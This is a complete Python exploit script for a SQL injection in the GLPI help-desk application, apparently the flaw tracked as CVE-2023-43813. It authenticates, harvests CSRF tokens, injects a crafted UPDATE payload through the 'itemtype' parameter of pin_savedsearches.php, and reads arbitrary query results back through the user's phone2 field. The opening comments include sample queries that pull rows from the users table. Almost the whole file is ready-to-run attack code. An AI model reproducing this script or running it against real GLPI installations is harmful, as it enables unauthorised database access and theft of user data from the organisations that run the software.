import argparse
import os
import requests
import urllib3

urllib3.disable_warnings()


# Examples of queries that can be used:
#     - To find the name of the current database:
#         SELECT DATABASE()
#     - The column that allows us to exfiltrate is limited to 255 characters (VARCHAR 255):
#         SELECT SUBSTR(name, 1,(SELECT IF(GREATEST(LENGTH(name), 214)=214, LENGTH(name), 214))) FROM (SELECT * FROM docker.glpi_users LIMIT 1 OFFSET 0) AS JUNK

# This variable is used to manage the verbosity of the exploit.
DEBUG = 0

# This variable is used to manage the type of local authentication on ldap (in
# the case of authentication via the active directory).
AUTH_TYPE = "local"
AUTH_TYPE_PARAMETERS = {
    "local": {
        "noAUTO": 0,
        "auth": "local"
    },
    "ldap-6": {
        "noAUTO": 1,
        "auth": "ldap-6"
    }
}

# This variable is used to avoid trashing the savedsearches_pinned column of the
# glpi_users table.
SAVEDSEARCHES_PINNED = ",".join([str(ord(i)) for i in '{"Ticket":1}'])

# These variables are used to retrieve the information exfiltrated from the database.
EXFILTRATION_START_DELIMITER = "EGO_START_DELIMITER"
EXFILTRATION_START_DELIMITER_ENCODED = ",".join([str(ord(i)) for i in EXFILTRATION_START_DELIMITER])
EXFILTRATION_END_DELIMITER = "EGO_END_DELIMITER"
EXFILTRATION_END_DELIMITER_ENCODED = ",".join([str(ord(i)) for i in EXFILTRATION_END_DELIMITER])

# Column updated with information extracted via SQL injection.
# It is preferable to exfiltrate information via a column of type varchar(255)
# whose content is returned by the server when the preferences are displayed.
EXFILTRATION_FIELD = "phone2"

# This variable configures the forwarding of HTTP requests to the Burp proxy.
PROXIES= {} # Raw
# PROXIES = {"http": "http://127.0.0.1:8080"} # Lab
# PROXIES = {"http": "http://127.0.0.1:8181"} # Pentest


# This function extracts the data between two delimiters.
def extract(raw, start_delimiter, end_delimiter):
    # The first delimiter is searched for.
    start = raw.find(start_delimiter)
    if start == -1:
        print("[x] Error: function extract() failed (can't find starting delimiter).")
        return None
    start = start + len(start_delimiter)
    # The second delimiter is searched for.
    end = raw[start::].find(end_delimiter)
    if end == -1:
        print("[x] Error: function extract() failed (can't find end delimiter).")
        return None
    end += start
    return raw[start:end]


class Attack:
    # Use a session to avoid having to manage cookies.
    s = requests.session()
    csrf_token = None
    # Credentials for authentication.
    login_name = None
    login_password = None
    # As the SQL query is of the UPDATE type, we will only update the row of
    # the glpi_users table whose api_token column contains our API key. This
    # trick allows us to select the row dedicated to our user during the UPDATE.
    api_key = os.environ["API_KEY"]
    api_key_encoded = ",".join([str(ord(i)) for i in api_key])
    # Variable storing exfiltrated information.
    output = None

    def __init__(self, url, username, password, query):
        if url[-1] != "/":
            self.url = f"{url}/"
        else:
            self.url = url
        self.username = username
        self.password = password
        self.query = query

    # This function lets you follow the flow of the exploit chain.
    def run(self):
        # Step 1: Pre-authentication information retrieval.
        if not self.get_fields():
            return 0

        # Step 2: Authentication.
        if not self.login():
            if DEBUG:
                print("[x] Unable to authenticate with the following credentials:")
                print(f"\t- {self.username}")
                print(f"\t- {self.password}")
            return 0

        # Step 3: Header recovery needed to reach the route vulnerable to SQL
        # injection.
        if not self.get_csrf():
            return 0

        # Step 4: SQL injection in an UPDATE query.
        if not self.inject_sql():
            return 0

        # Step 5: Exfiltration of information via the column EXFILTRATION_FIELD
        # returned by the server when user preferences are displayed.
        if not self.exfiltrate():
            return 0

        # Step 6: The variable $_SESSION['glpisavedsearches_pinned'] has been
        # trashed, so we flush it to be able to exploit the vulnerability again.
        self.flush()

        # Viewing exfiltrated information.
        print(self.output)
        return 1

    # This function is used before authentication within GLPI to retrieve POST
    # request fields name.
    def get_fields(self):
        new_url = self.url
        r = self.s.get(
            url=new_url,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )

        if r.status_code != 200:
            if DEBUG:
                print("[x] Status code not expected (expected: 200).")
            return 0
        self.csrf_token = extract(
            r.text,
            'name="_glpi_csrf_token" value="',
            '"'
        )
        self.login_name = extract(
            r.text,
            'id="login_name" name="',
            '"'
        )
        self.login_password = extract(
            r.text,
            'id="login_password" name="',
            '"'
        )

        if not(self.csrf_token) or not(self.login_name) or not(self.login_password):
            if DEBUG:
                print("[x] Impossible to find one of these values:")
                print("\t- _glpi_csrf_token")
                print("\t- login_name")
                print("\t- login_password")
            return 0

        if DEBUG:
            print("[*] The following information has been obtained (step 1):")
            print(f"\t- _glpi_csrf_token: {self.csrf_token}")
            print(f"\t- login_name: {self.login_name}")
            print(f"\t- login_password: {self.login_password}")
        return 1

    # This function allows you to authenticate yourself into the application.
    def login(self):
        new_url = f"{self.url}front/login.php"
        datas = {
            "noAUTO": AUTH_TYPE_PARAMETERS[AUTH_TYPE]["noAUTO"],
            "redirect": "",
            "_glpi_csrf_token":self.csrf_token,
            self.login_name: self.username,
            self.login_password: self.password,
            "auth": AUTH_TYPE_PARAMETERS[AUTH_TYPE]["auth"],
            "submit": ""
        }
        r = self.s.post(
            url=new_url,
            data=datas,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )

        if r.status_code != 302:
            print("[x] Status code not expected (expected: 302).")
            return 0

        if DEBUG:
            print("[*] Authentication successful (step 2).")
        return 1

    # This function retrieves the CSRF token used to exploit the SQL injection requests.
    def get_csrf(self):
        self.csrf_token = None
        new_url = f"{self.url}front/ticket.php"
        r = self.s.get(
            url=new_url,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )

        if r.status_code != 200:
            if DEBUG:
                print("[x] Status code not expected (expected: 200).")
            return 0
        self.csrf_token = extract(
            r.text,
            'glpi:csrf_token" content="',
            '"'
        )
        if not self.csrf_token:
            if DEBUG:
                print("[x] Unable to retrieve CSRF token.")
            return 0

        if DEBUG:
            print("[*] The following information has been obtained (step 3):")
            print(f"\t- glpi:csrf_token: {self.csrf_token}")
        return 1

    # This function exploits the SQL injection in UPDATE queries.
    def inject_sql(self):
        new_url = f"{self.url}ajax/pin_savedsearches.php"
        sql_query = f"AAAA', savedsearches_pinned=CHAR({SAVEDSEARCHES_PINNED})," \
            + f"{EXFILTRATION_FIELD}=CONCAT(CHAR({EXFILTRATION_START_DELIMITER_ENCODED}),(" + self.query + f"),CHAR({EXFILTRATION_END_DELIMITER_ENCODED})) " \
            + f"WHERE api_token=CHAR({self.api_key_encoded}) -- -;"
        datas = {
            "itemtype": sql_query
        }
        headers = {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "User-Agent": None,
            "X-Glpi-Csrf-Token": self.csrf_token
        }
        r = self.s.post(
            url=new_url,
            headers=headers,
            data=datas,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )

        if r.status_code != 200 or r.text.find("true") == -1:
            if DEBUG:
                print("[x] SQL injection failed.")
            return 0

        if DEBUG:
            print("[*] SQL injection is a success (step 4).")
        return 1

    # This function exfiltrates information from the database once the injection
    # has been carried out.
    def exfiltrate(self):
        new_url = f"{self.url}ajax/common.tabs.php?_itemtype=Preference&_glpi_tab=User$1"
        r = self.s.get(
            url=new_url,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )

        if r.status_code != 200 or r.text.find("EGO_START_DELIMITER") == -1 or r.text.find("EGO_END_DELIMITER") == -1:
            if DEBUG:
                print("[x] Exfiltration failed.")
            return 0

        self.output = extract(
            r.text,
            "EGO_START_DELIMITER",
            "EGO_END_DELIMITER"
        )
        if DEBUG:
            print("[*] Exfiltration is a success (step 5).")
        return 1

    # This function flushes the encoded array (in JSON format) stored in session
    # variable "$_SESSION['glpisavedsearches_pinned']".
    def flush(self):
        new_url = f"{self.url}front/logout.php"
        r = self.s.get(
            url=new_url,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )


def main(options):
    attack = Attack(options["url"], options["username"], options["password"], options["query"])
    if not attack.run():
        if DEBUG:
            print("[x] Attack failed.")
        exit(-1)
    if DEBUG:
        print("[+] Exploit succeed.")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="GLPI 1day exploit for CVE-2023-43813 (GHSA-94c3-fw5r-3362).")
    parser.add_argument("url", help="Target's URL.")
    parser.add_argument("username", help="Username for logging on to the Web interface.")
    parser.add_argument("password", help="Password for logging on to the Web interface.")
    parser.add_argument("query", help="SQL query.")
    args = parser.parse_args()

    options = {}
    options["url"] = args.url
    options["username"] = args.username
    options["password"] = args.password
    options["query"] = args.query
    main(options)
